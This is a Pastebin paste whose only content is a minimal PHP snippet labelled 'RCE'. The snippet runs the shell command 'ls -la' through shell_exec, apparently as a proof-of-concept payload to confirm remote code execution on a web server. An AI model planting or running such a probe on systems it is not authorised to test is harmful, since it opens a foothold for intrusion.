Advertisement
Guest User

Untitled

a guest
Apr 19th, 2019
133
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.07 KB | None | 0 0
  1. <pre>
  2. <?php
  3.  
  4. echo "RCE";
  5. echo shell_exec("ls -la");
  6.  
  7. ?>
  8. </pre>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement